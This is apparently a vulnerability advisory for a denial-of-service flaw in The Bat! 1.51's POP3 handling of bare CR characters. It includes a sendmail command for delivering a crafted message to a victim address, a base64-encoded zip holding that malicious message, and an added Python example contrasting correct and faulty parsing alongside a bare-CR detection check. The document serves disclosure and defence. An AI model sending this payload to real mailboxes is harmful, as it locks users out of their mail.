The Bat! 1.51 fun DoS



Vulnerability

    The Bat!

Affected

    The Bat! 1.51 (latest)

Description

    3APA3A found the following.  This issue has more fun than security
    impact, but it is a kind of DoS and can cause a lot of headache for
    postmasters.  The Bat! is a very convenient, commercially available
    MUA for Windows with a lot of features.

    While retrieving a message via POP3 (IMAP was not tested), The Bat!
    incorrectly processes a 0x0D (CR) character that is not followed by
    0x0A (LF).  The Bat! miscalculates the end of the message, and the
    remainder of the message is treated as a reply from the POP3 server.
    The Bat! then fails to receive the rest of the messages and fails to
    delete the received messages from the server.  This leads to a DoS
    against the user's POP3 account.  A malformed message can emulate
    any POP3 server reply.
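    The failure described above is a line-framing bug: a POP3 client must
    treat only CRLF as a line terminator and only a lone "." line as the
    end of a RETR body (RFC 1939), so a bare CR is ordinary message data.
    The following is an added example, not code from the advisory or from
    The Bat!; it parses a constructed RETR reply correctly, models the
    faulty "split on CR" behaviour for comparison, and includes a check a
    postmaster could run over a message to flag bare CRs before delivery.
    The sample stream and all function names are assumptions made here.

```python
import io
import re

CRLF = b"\r\n"

# Constructed sample (not the advisory's attachment): one RETR reply
# followed by the next status line on the same connection. The body
# holds a bare CR (0x0D without 0x0A) followed by reply-shaped text.
SAMPLE_STREAM = (
    b"+OK message follows\r\n"
    b"From: someone@example.invalid\r\n"
    b"Subject: test\r\n"
    b"\r\n"
    b"line one\r\n"
    b"line two\r-ERR Wrong User\r\n"
    b"..a line that starts with a dot is byte-stuffed\r\n"
    b".\r\n"
    b"+OK 0 octets\r\n"
)

# A CR that is not immediately followed by LF.
BARE_CR = re.compile(rb"\r(?!\n)")


def find_bare_cr(data):
    """Return the byte offsets of every CR not followed by LF (gateway check)."""
    return [m.start() for m in BARE_CR.finditer(data)]


def _readline(stream):
    """Read up to LF and strip the line ending; None at EOF."""
    raw = stream.readline()          # BytesIO.readline splits only on b'\n'
    if not raw:
        return None
    if raw.endswith(CRLF):
        return raw[:-2]
    return raw.rstrip(b"\n")         # tolerate a bare-LF line ending


def read_pop3_multiline(stream):
    """Parse one status line and, if +OK, its multi-line body per RFC 1939.

    Only CRLF ends a line; a bare CR stays inside the line. The body ends
    at a line that is exactly '.', and a leading '..' is un-stuffed to '.'.
    Returns (status, body_lines, complete).
    """
    status = _readline(stream)
    if status is None or not status.startswith(b"+OK"):
        return status, [], status is not None
    body = []
    while True:
        line = _readline(stream)
        if line is None:             # connection closed before terminator
            return status, body, False
        if line == b".":
            return status, body, True
        if line.startswith(b".."):
            line = line[1:]
        body.append(line)


def naive_split_on_cr(stream):
    """Model of the faulty behaviour: CR ends a line, and any line that
    begins with '+OK' or '-ERR' is taken for a new server reply.
    Returns (status, truncated_body, bogus_reply_or_None)."""
    status = _readline(stream)
    body = []
    while True:
        raw = stream.readline()
        if not raw:
            return status, body, None
        for piece in raw.rstrip(CRLF).split(b"\r"):
            if piece == b".":
                return status, body, None
            if piece.startswith((b"+OK", b"-ERR")):
                return status, body, piece   # body cut short, stream desynced
            body.append(piece)


if __name__ == "__main__":
    good = read_pop3_multiline(io.BytesIO(SAMPLE_STREAM))
    bad = naive_split_on_cr(io.BytesIO(SAMPLE_STREAM))
    print("compliant parser body lines:", len(good[1]), "complete:", good[2])
    print("faulty parser saw bogus reply:", bad[2])
    print("bare CR offsets:", find_bare_cr(SAMPLE_STREAM))
```

    With the compliant parser the bare CR is just a byte inside "line
    two", the terminator is found, and the real "+OK 0 octets" that
    follows is left unread for the next command; the faulty model stops
    at the fake "-ERR" and leaves the connection out of sync, which is
    exactly the state in which a client can neither fetch the remaining
    messages nor issue DELE for the ones it already has.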

    For exploitation, extract the attached "badmessage" and send it,
    e.g. using

        cat badmessage | sendmail -U victim@somewhere.net

    or copy it to the user's mailbox.  This message causes The Bat! to
    show something like:

        !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--

    The message is crafted not to contain this text anywhere in its
    body.

    ---
    Content-Type: application/octet-stream; name="badmess.zip"
    Content-Transfer-Encoding: base64
    Content-Disposition: inline; filename="badmess.zip"
    Content-MD5: dq0gD0D8rsjIUxp7zuVmNg==
    
    UEsDBBQAAAAIACCPjSoKbVmJuAEAAAMEAAAHACQAYmFkbWVzcwoAIAAAAAAAAQAYAAAeNJwh
    xMABwOLkTyLEwAHAstHPG8TAAa1S32/TMBB+5iT+h2NPTCOpna0QvFGtbB0qUgC1KTy7idca
    Gjvyj7H899hRtAmx9mVYebBz39333d13Y3SDSq913V1aUXkjXZcqpe9S47Hcepy2BmmGdMwI
    Zdk7zAihcM2dYDH8JsYiJP5+BJ2QM0LwdbG8PobIwPZRQCGs5RuRzGuGF7EIOaMZpYSm36ZT
    QrNx/k/OBK60ckK5pDRc2VthkpmqdC3VhmG+lg5KvZ9w6dc/ReWCemEdNoEeinkxS74LY6VW
    DGlKHgm6NvTZ+J2TLTdu1Mh7UZ/Di7X2quam+3A0Wyzwh9FqgysrDEMj2h2vBPrwwt/SbbHT
    3qDtrBMN8rqRSlpnuNPmCJaOO28ZrgDKrbQYPo69GqEq3lq/C3Oue5FhRpAkz2D7uycn7t0o
    5Ep1YJi/tMwTA4AIZcA/6PifQoaaI3Nb5Vl2fkBNv1mY9IZtAyS1lUyGrb6yXNVdvLi41SeM
    +/awcU8ZIeyU4gnJonE/FWV/O97rT5J+mU4zkufj/P1lJJ3AzeJrMdjqYo/7JrBcffw8uyoH
    3Esc7AgA89C4UXw3RJ46+IBxAyaFZ24jSeAPUEsBAhkAFAAAAAgAII+NKgptWYm4AQAAAwQA
    AAcAAAAAAAAAAAAgAAAAAAAAAGJhZG1lc3NQSwUGAAAAAAEAAQA1AAAAAQIAAAAA
    
    -----

Solution

    Use the "Dispatch Mail on Server" feature to delete the malformed
    message from the server, or use a different MUA as a workaround.
    There is no proper solution.

